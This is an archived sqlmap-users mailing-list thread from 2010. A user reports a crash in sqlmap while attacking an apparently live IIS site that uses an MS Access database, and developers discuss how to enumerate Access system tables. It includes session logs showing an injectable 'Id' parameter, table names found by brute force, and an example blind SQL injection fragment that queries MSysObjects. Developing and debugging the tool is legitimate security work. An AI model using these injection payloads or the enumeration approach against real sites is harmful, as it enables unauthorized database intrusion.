http://www.ThorSecurity.com.ar/gabrielvergara.pgp >>> -------->8-------- >>> >> >> >> >> -- >> Miroslav Stampar >> >> E-mail / Jabber: miroslav.stampar (at) gmail.com >> Mobile: +385921010204 (HR 0921010204) >> PGP Key ID: 0xB5397B1B >> Location: Zagreb, Croatia >> > > > > -- > --------8<-------- > Carlos Gabriel Vergara > http://www.ThorSecurity.com.ar > > PGP: http://www.ThorSecurity.com.ar/gabrielvergara.pgp > -------->8-------- > -- Miroslav Stampar E-mail / Jabber: miroslav.stampar (at) gmail.com Mobile: +385921010204 (HR 0921010204) PGP Key ID: 0xB5397B1B Location: Zagreb, Croatia |
|
From: Carlos G. V. <car...@gm...> - 2010-11-09 14:06:16
|
"The law of the default" If you must explicity set the permissions, then will be difficult to find this kind of info. But if we are lucky and found a "lazy-non-standard" programming, this could be a nice security breach. I will read a little further... if something is found, will share it. Best regards, 2010/11/5 Miroslav Stampar <mir...@gm...>: > well, > > SELECT Name FROM MSysObjects WHERE Type = 1 > > (we already have it in ./xml/queries.xml) > > should basically get you this kind of information, but as I've > understood querying it from outside the MS Access environment (web > browser, ODBC connection) should result in: > > .....id=1 AND EXISTS(SELECT * FROM MSysObjects) > > Warning: odbc_exec() [function.odbc-exec]: SQL error: [Microsoft][ODBC > Microsoft Access Driver] Record(s) cannot be read; no read permission > on 'MSysObjects'., SQL state 42000 in SQLExecDirect in ....php on line > 33 > SQL error: [Microsoft][ODBC Microsoft Access Driver] Record(s) cannot > be read; no read permission on 'MSysObjects'. > > i haven't tested this against ASP environment, though. > > On Fri, Nov 5, 2010 at 7:17 PM, Carlos Gabriel Vergara > <car...@gm...> wrote: >> I was working with access some time ago, and now that you mention, i >> was working on getting metadata for the db. As far as i know, there >> are some "system tables", equivalent to sysobjects (mssql) or >> information_schema (mysql). Take a look at this article: >> >> http://www.datanumen.com/aar/articles/system-object.htm >> >> If i can find my test scripts, i will attach some to the list. >> >> Best regards, >> >> >> 2010/11/4 Miroslav Stampar <mir...@gm...>: >>> hi Ulises. >>> >>> i am glad to see that someone has started using sqlmap against Access >>> databases :) >>> >>> we've done necessary patches to prevent sqlmap crash in this kind of >>> situations, but still, we don't have implemented dumping of tables for >>> MS Access (due to non existent way for column enumeration - if someone >>> has some idea non-brute force related, please say and we'll try to >>> implement it). also, support for this DBMS is still in (early) >>> development phase and we hope that we'll finish it in some reasonable >>> time. >>> >>> kr >>> >>> On Thu, Nov 4, 2010 at 8:05 PM, Ulises2k <uli...@gm...> wrote: >>>> >>>> [15:30:49] [INFO] using '/root/sqlmap-dev/output/xxxx/session' as session >>>> file >>>> [15:30:49] [INFO] resuming injection point 'GET' from session file >>>> [15:30:49] [INFO] resuming injection parameter 'Id' from session file >>>> [15:30:49] [INFO] resuming injection type 'numeric' from session file >>>> [15:30:49] [INFO] resuming match ratio '0.9' from session file >>>> [15:30:49] [INFO] resuming 0 number of parenthesis from session file >>>> [15:30:49] [INFO] resuming back-end DBMS 'microsoft access' from session >>>> file >>>> [15:30:49] [INFO] testing connection to the target url >>>> [15:30:50] [INFO] testing for parenthesis on injectable parameter >>>> [15:30:50] [INFO] the back-end DBMS is Microsoft Access >>>> web server operating system: Windows 2008 >>>> web application technology: ASP.NET, Microsoft IIS 7.5, ASP >>>> back-end DBMS: Microsoft Access >>>> [15:30:50] [ERROR] cannot retrieve table names, back-end DBMS is Access >>>> do you want to use common table existance check? [Y/n/q]Y >>>> [15:30:52] [INFO] checking tables existence using items from >>>> '/root/sqlmap-dev/txt/common-tables.txt' >>>> [15:32:06] [INFO] retrieved: >>>> notas >>>> [15:57:55] [INFO] tried: 1780/1780 items (100%) >>>> >>>> [15:57:55] [CRITICAL] unhandled exception in sqlmap/0.9-dev, retry your run >>>> with the latest development version from the Subversion repository. If the >>>> exception persists, please send by e-mail to >>>> sql...@li... the command line, the following text and >>>> any information needed to reproduce the bug. The developers will try to >>>> reproduce the bug, fix it accordingly and get back to you. >>>> sqlmap version: 0.9-dev (r2265) >>>> Python version: 2.5.2 >>>> Operating system: posix >>>> Traceback (most recent call last): >>>> File "./sqlmap.py", line 79, in main >>>> start() >>>> File "/root/sqlmap-dev/lib/controller/controller.py", line 298, in start >>>> action() >>>> File "/root/sqlmap-dev/lib/controller/action.py", line 117, in action >>>> conf.dbmsHandler.dumpAll() >>>> File "/root/sqlmap-dev/plugins/generic/enumeration.py", line 1263, in >>>> dumpAll >>>> for db, tables in kb.data.cachedTables.items(): >>>> AttributeError: 'list' object has no attribute 'items' >>>> >>>> >>>> ------------------------------------------------------------------------------ >>>> The Next 800 Companies to Lead America's Growth: New Video Whitepaper >>>> David G. Thomson, author of the best-selling book "Blueprint to a >>>> Billion" shares his insights and actions to help propel your >>>> business during the next growth cycle. Listen Now! >>>> http://p.sf.net/sfu/SAP-dev2dev >>>> _______________________________________________ >>>> sqlmap-users mailing list >>>> sql...@li... >>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >>>> >>>> >>> >>> >>> >>> -- >>> Miroslav Stampar >>> >>> E-mail / Jabber: miroslav.stampar (at) gmail.com >>> Mobile: +385921010204 (HR 0921010204) >>> PGP Key ID: 0xB5397B1B >>> Location: Zagreb, Croatia >>> >>> ------------------------------------------------------------------------------ >>> The Next 800 Companies to Lead America's Growth: New Video Whitepaper >>> David G. Thomson, author of the best-selling book "Blueprint to a >>> Billion" shares his insights and actions to help propel your >>> business during the next growth cycle. Listen Now! >>> http://p.sf.net/sfu/SAP-dev2dev >>> _______________________________________________ >>> sqlmap-users mailing list >>> sql...@li... >>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >>> >> >> >> >> -- >> --------8<-------- >> Carlos Gabriel Vergara >> http://www.ThorSecurity.com.ar >> >> PGP: http://www.ThorSecurity.com.ar/gabrielvergara.pgp >> -------->8-------- >> > > > > -- > Miroslav Stampar > > E-mail / Jabber: miroslav.stampar (at) gmail.com > Mobile: +385921010204 (HR 0921010204) > PGP Key ID: 0xB5397B1B > Location: Zagreb, Croatia > -- --------8<-------- Carlos Gabriel Vergara http://www.ThorSecurity.com.ar PGP: http://www.ThorSecurity.com.ar/gabrielvergara.pgp -------->8-------- |
|
From: Miroslav S. <mir...@gm...> - 2010-11-06 00:54:43
|
according to http://forums.aspfree.com/microsoft-sql-server-14/what-prevents-me-from-reading-the-msysobjects-tbl-17321.html user needs to explicitly add permissions for querying of system tables (to all). as I am not fully aware how much people do this, I am left pretty undecided :) On Sat, Nov 6, 2010 at 1:47 AM, Miroslav Stampar <mir...@gm...> wrote: > well, > > SELECT Name FROM MSysObjects WHERE Type = 1 > > (we already have it in ./xml/queries.xml) > > should basically get you this kind of information, but as I've > understood querying it from outside the MS Access environment (web > browser, ODBC connection) should result in: > > .....id=1 AND EXISTS(SELECT * FROM MSysObjects) > > Warning: odbc_exec() [function.odbc-exec]: SQL error: [Microsoft][ODBC > Microsoft Access Driver] Record(s) cannot be read; no read permission > on 'MSysObjects'., SQL state 42000 in SQLExecDirect in ....php on line > 33 > SQL error: [Microsoft][ODBC Microsoft Access Driver] Record(s) cannot > be read; no read permission on 'MSysObjects'. > > i haven't tested this against ASP environment, though. > > On Fri, Nov 5, 2010 at 7:17 PM, Carlos Gabriel Vergara > <car...@gm...> wrote: >> I was working with access some time ago, and now that you mention, i >> was working on getting metadata for the db. As far as i know, there >> are some "system tables", equivalent to sysobjects (mssql) or >> information_schema (mysql). Take a look at this article: >> >> http://www.datanumen.com/aar/articles/system-object.htm >> >> If i can find my test scripts, i will attach some to the list. >> >> Best regards, >> >> >> 2010/11/4 Miroslav Stampar <mir...@gm...>: >>> hi Ulises. >>> >>> i am glad to see that someone has started using sqlmap against Access >>> databases :) >>> >>> we've done necessary patches to prevent sqlmap crash in this kind of >>> situations, but still, we don't have implemented dumping of tables for >>> MS Access (due to non existent way for column enumeration - if someone >>> has some idea non-brute force related, please say and we'll try to >>> implement it). also, support for this DBMS is still in (early) >>> development phase and we hope that we'll finish it in some reasonable >>> time. >>> >>> kr >>> >>> On Thu, Nov 4, 2010 at 8:05 PM, Ulises2k <uli...@gm...> wrote: >>>> >>>> [15:30:49] [INFO] using '/root/sqlmap-dev/output/xxxx/session' as session >>>> file >>>> [15:30:49] [INFO] resuming injection point 'GET' from session file >>>> [15:30:49] [INFO] resuming injection parameter 'Id' from session file >>>> [15:30:49] [INFO] resuming injection type 'numeric' from session file >>>> [15:30:49] [INFO] resuming match ratio '0.9' from session file >>>> [15:30:49] [INFO] resuming 0 number of parenthesis from session file >>>> [15:30:49] [INFO] resuming back-end DBMS 'microsoft access' from session >>>> file >>>> [15:30:49] [INFO] testing connection to the target url >>>> [15:30:50] [INFO] testing for parenthesis on injectable parameter >>>> [15:30:50] [INFO] the back-end DBMS is Microsoft Access >>>> web server operating system: Windows 2008 >>>> web application technology: ASP.NET, Microsoft IIS 7.5, ASP >>>> back-end DBMS: Microsoft Access >>>> [15:30:50] [ERROR] cannot retrieve table names, back-end DBMS is Access >>>> do you want to use common table existance check? [Y/n/q]Y >>>> [15:30:52] [INFO] checking tables existence using items from >>>> '/root/sqlmap-dev/txt/common-tables.txt' >>>> [15:32:06] [INFO] retrieved: >>>> notas >>>> [15:57:55] [INFO] tried: 1780/1780 items (100%) >>>> >>>> [15:57:55] [CRITICAL] unhandled exception in sqlmap/0.9-dev, retry your run >>>> with the latest development version from the Subversion repository. If the >>>> exception persists, please send by e-mail to >>>> sql...@li... the command line, the following text and >>>> any information needed to reproduce the bug. The developers will try to >>>> reproduce the bug, fix it accordingly and get back to you. >>>> sqlmap version: 0.9-dev (r2265) >>>> Python version: 2.5.2 >>>> Operating system: posix >>>> Traceback (most recent call last): >>>> File "./sqlmap.py", line 79, in main >>>> start() >>>> File "/root/sqlmap-dev/lib/controller/controller.py", line 298, in start >>>> action() >>>> File "/root/sqlmap-dev/lib/controller/action.py", line 117, in action >>>> conf.dbmsHandler.dumpAll() >>>> File "/root/sqlmap-dev/plugins/generic/enumeration.py", line 1263, in >>>> dumpAll >>>> for db, tables in kb.data.cachedTables.items(): >>>> AttributeError: 'list' object has no attribute 'items' >>>> >>>> >>>> ------------------------------------------------------------------------------ >>>> The Next 800 Companies to Lead America's Growth: New Video Whitepaper >>>> David G. Thomson, author of the best-selling book "Blueprint to a >>>> Billion" shares his insights and actions to help propel your >>>> business during the next growth cycle. Listen Now! >>>> http://p.sf.net/sfu/SAP-dev2dev >>>> _______________________________________________ >>>> sqlmap-users mailing list >>>> sql...@li... >>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >>>> >>>> >>> >>> >>> >>> -- >>> Miroslav Stampar >>> >>> E-mail / Jabber: miroslav.stampar (at) gmail.com >>> Mobile: +385921010204 (HR 0921010204) >>> PGP Key ID: 0xB5397B1B >>> Location: Zagreb, Croatia >>> >>> ------------------------------------------------------------------------------ >>> The Next 800 Companies to Lead America's Growth: New Video Whitepaper >>> David G. Thomson, author of the best-selling book "Blueprint to a >>> Billion" shares his insights and actions to help propel your >>> business during the next growth cycle. Listen Now! >>> http://p.sf.net/sfu/SAP-dev2dev >>> _______________________________________________ >>> sqlmap-users mailing list >>> sql...@li... >>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >>> >> >> >> >> -- >> --------8<-------- >> Carlos Gabriel Vergara >> http://www.ThorSecurity.com.ar >> >> PGP: http://www.ThorSecurity.com.ar/gabrielvergara.pgp >> -------->8-------- >> > > > > -- > Miroslav Stampar > > E-mail / Jabber: miroslav.stampar (at) gmail.com > Mobile: +385921010204 (HR 0921010204) > PGP Key ID: 0xB5397B1B > Location: Zagreb, Croatia > -- Miroslav Stampar E-mail / Jabber: miroslav.stampar (at) gmail.com Mobile: +385921010204 (HR 0921010204) PGP Key ID: 0xB5397B1B Location: Zagreb, Croatia |
|
From: Miroslav S. <mir...@gm...> - 2010-11-06 00:47:49
|
well, SELECT Name FROM MSysObjects WHERE Type = 1 (we already have it in ./xml/queries.xml) should basically get you this kind of information, but as I've understood querying it from outside the MS Access environment (web browser, ODBC connection) should result in: .....id=1 AND EXISTS(SELECT * FROM MSysObjects) Warning: odbc_exec() [function.odbc-exec]: SQL error: [Microsoft][ODBC Microsoft Access Driver] Record(s) cannot be read; no read permission on 'MSysObjects'., SQL state 42000 in SQLExecDirect in ....php on line 33 SQL error: [Microsoft][ODBC Microsoft Access Driver] Record(s) cannot be read; no read permission on 'MSysObjects'. i haven't tested this against ASP environment, though. On Fri, Nov 5, 2010 at 7:17 PM, Carlos Gabriel Vergara <car...@gm...> wrote: > I was working with access some time ago, and now that you mention, i > was working on getting metadata for the db. As far as i know, there > are some "system tables", equivalent to sysobjects (mssql) or > information_schema (mysql). Take a look at this article: > > http://www.datanumen.com/aar/articles/system-object.htm > > If i can find my test scripts, i will attach some to the list. > > Best regards, > > > 2010/11/4 Miroslav Stampar <mir...@gm...>: >> hi Ulises. >> >> i am glad to see that someone has started using sqlmap against Access >> databases :) >> >> we've done necessary patches to prevent sqlmap crash in this kind of >> situations, but still, we don't have implemented dumping of tables for >> MS Access (due to non existent way for column enumeration - if someone >> has some idea non-brute force related, please say and we'll try to >> implement it). also, support for this DBMS is still in (early) >> development phase and we hope that we'll finish it in some reasonable >> time. >> >> kr >> >> On Thu, Nov 4, 2010 at 8:05 PM, Ulises2k <uli...@gm...> wrote: >>> >>> [15:30:49] [INFO] using '/root/sqlmap-dev/output/xxxx/session' as session >>> file >>> [15:30:49] [INFO] resuming injection point 'GET' from session file >>> [15:30:49] [INFO] resuming injection parameter 'Id' from session file >>> [15:30:49] [INFO] resuming injection type 'numeric' from session file >>> [15:30:49] [INFO] resuming match ratio '0.9' from session file >>> [15:30:49] [INFO] resuming 0 number of parenthesis from session file >>> [15:30:49] [INFO] resuming back-end DBMS 'microsoft access' from session >>> file >>> [15:30:49] [INFO] testing connection to the target url >>> [15:30:50] [INFO] testing for parenthesis on injectable parameter >>> [15:30:50] [INFO] the back-end DBMS is Microsoft Access >>> web server operating system: Windows 2008 >>> web application technology: ASP.NET, Microsoft IIS 7.5, ASP >>> back-end DBMS: Microsoft Access >>> [15:30:50] [ERROR] cannot retrieve table names, back-end DBMS is Access >>> do you want to use common table existance check? [Y/n/q]Y >>> [15:30:52] [INFO] checking tables existence using items from >>> '/root/sqlmap-dev/txt/common-tables.txt' >>> [15:32:06] [INFO] retrieved: >>> notas >>> [15:57:55] [INFO] tried: 1780/1780 items (100%) >>> >>> [15:57:55] [CRITICAL] unhandled exception in sqlmap/0.9-dev, retry your run >>> with the latest development version from the Subversion repository. If the >>> exception persists, please send by e-mail to >>> sql...@li... the command line, the following text and >>> any information needed to reproduce the bug. The developers will try to >>> reproduce the bug, fix it accordingly and get back to you. >>> sqlmap version: 0.9-dev (r2265) >>> Python version: 2.5.2 >>> Operating system: posix >>> Traceback (most recent call last): >>> File "./sqlmap.py", line 79, in main >>> start() >>> File "/root/sqlmap-dev/lib/controller/controller.py", line 298, in start >>> action() >>> File "/root/sqlmap-dev/lib/controller/action.py", line 117, in action >>> conf.dbmsHandler.dumpAll() >>> File "/root/sqlmap-dev/plugins/generic/enumeration.py", line 1263, in >>> dumpAll >>> for db, tables in kb.data.cachedTables.items(): >>> AttributeError: 'list' object has no attribute 'items' >>> >>> >>> ------------------------------------------------------------------------------ >>> The Next 800 Companies to Lead America's Growth: New Video Whitepaper >>> David G. Thomson, author of the best-selling book "Blueprint to a >>> Billion" shares his insights and actions to help propel your >>> business during the next growth cycle. Listen Now! >>> http://p.sf.net/sfu/SAP-dev2dev >>> _______________________________________________ >>> sqlmap-users mailing list >>> sql...@li... >>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >>> >>> >> >> >> >> -- >> Miroslav Stampar >> >> E-mail / Jabber: miroslav.stampar (at) gmail.com >> Mobile: +385921010204 (HR 0921010204) >> PGP Key ID: 0xB5397B1B >> Location: Zagreb, Croatia >> >> ------------------------------------------------------------------------------ >> The Next 800 Companies to Lead America's Growth: New Video Whitepaper >> David G. Thomson, author of the best-selling book "Blueprint to a >> Billion" shares his insights and actions to help propel your >> business during the next growth cycle. Listen Now! >> http://p.sf.net/sfu/SAP-dev2dev >> _______________________________________________ >> sqlmap-users mailing list >> sql...@li... >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> > > > > -- > --------8<-------- > Carlos Gabriel Vergara > http://www.ThorSecurity.com.ar > > PGP: http://www.ThorSecurity.com.ar/gabrielvergara.pgp > -------->8-------- > -- Miroslav Stampar E-mail / Jabber: miroslav.stampar (at) gmail.com Mobile: +385921010204 (HR 0921010204) PGP Key ID: 0xB5397B1B Location: Zagreb, Croatia |
|
From: Carlos G. V. <car...@gm...> - 2010-11-05 18:17:33
|
I was working with access some time ago, and now that you mention, i was working on getting metadata for the db. As far as i know, there are some "system tables", equivalent to sysobjects (mssql) or information_schema (mysql). Take a look at this article: http://www.datanumen.com/aar/articles/system-object.htm If i can find my test scripts, i will attach some to the list. Best regards, 2010/11/4 Miroslav Stampar <mir...@gm...>: > hi Ulises. > > i am glad to see that someone has started using sqlmap against Access > databases :) > > we've done necessary patches to prevent sqlmap crash in this kind of > situations, but still, we don't have implemented dumping of tables for > MS Access (due to non existent way for column enumeration - if someone > has some idea non-brute force related, please say and we'll try to > implement it). also, support for this DBMS is still in (early) > development phase and we hope that we'll finish it in some reasonable > time. > > kr > > On Thu, Nov 4, 2010 at 8:05 PM, Ulises2k <uli...@gm...> wrote: >> >> [15:30:49] [INFO] using '/root/sqlmap-dev/output/xxxx/session' as session >> file >> [15:30:49] [INFO] resuming injection point 'GET' from session file >> [15:30:49] [INFO] resuming injection parameter 'Id' from session file >> [15:30:49] [INFO] resuming injection type 'numeric' from session file >> [15:30:49] [INFO] resuming match ratio '0.9' from session file >> [15:30:49] [INFO] resuming 0 number of parenthesis from session file >> [15:30:49] [INFO] resuming back-end DBMS 'microsoft access' from session >> file >> [15:30:49] [INFO] testing connection to the target url >> [15:30:50] [INFO] testing for parenthesis on injectable parameter >> [15:30:50] [INFO] the back-end DBMS is Microsoft Access >> web server operating system: Windows 2008 >> web application technology: ASP.NET, Microsoft IIS 7.5, ASP >> back-end DBMS: Microsoft Access >> [15:30:50] [ERROR] cannot retrieve table names, back-end DBMS is Access >> do you want to use common table existance check? [Y/n/q]Y >> [15:30:52] [INFO] checking tables existence using items from >> '/root/sqlmap-dev/txt/common-tables.txt' >> [15:32:06] [INFO] retrieved: >> notas >> [15:57:55] [INFO] tried: 1780/1780 items (100%) >> >> [15:57:55] [CRITICAL] unhandled exception in sqlmap/0.9-dev, retry your run >> with the latest development version from the Subversion repository. If the >> exception persists, please send by e-mail to >> sql...@li... the command line, the following text and >> any information needed to reproduce the bug. The developers will try to >> reproduce the bug, fix it accordingly and get back to you. >> sqlmap version: 0.9-dev (r2265) >> Python version: 2.5.2 >> Operating system: posix >> Traceback (most recent call last): >> File "./sqlmap.py", line 79, in main >> start() >> File "/root/sqlmap-dev/lib/controller/controller.py", line 298, in start >> action() >> File "/root/sqlmap-dev/lib/controller/action.py", line 117, in action >> conf.dbmsHandler.dumpAll() >> File "/root/sqlmap-dev/plugins/generic/enumeration.py", line 1263, in >> dumpAll >> for db, tables in kb.data.cachedTables.items(): >> AttributeError: 'list' object has no attribute 'items' >> >> >> ------------------------------------------------------------------------------ >> The Next 800 Companies to Lead America's Growth: New Video Whitepaper >> David G. Thomson, author of the best-selling book "Blueprint to a >> Billion" shares his insights and actions to help propel your >> business during the next growth cycle. Listen Now! >> http://p.sf.net/sfu/SAP-dev2dev >> _______________________________________________ >> sqlmap-users mailing list >> sql...@li... >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> >> > > > > -- > Miroslav Stampar > > E-mail / Jabber: miroslav.stampar (at) gmail.com > Mobile: +385921010204 (HR 0921010204) > PGP Key ID: 0xB5397B1B > Location: Zagreb, Croatia > > ------------------------------------------------------------------------------ > The Next 800 Companies to Lead America's Growth: New Video Whitepaper > David G. Thomson, author of the best-selling book "Blueprint to a > Billion" shares his insights and actions to help propel your > business during the next growth cycle. Listen Now! > http://p.sf.net/sfu/SAP-dev2dev > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > -- --------8<-------- Carlos Gabriel Vergara http://www.ThorSecurity.com.ar PGP: http://www.ThorSecurity.com.ar/gabrielvergara.pgp -------->8-------- |
48 messages has been excluded from this view by a project administrator.
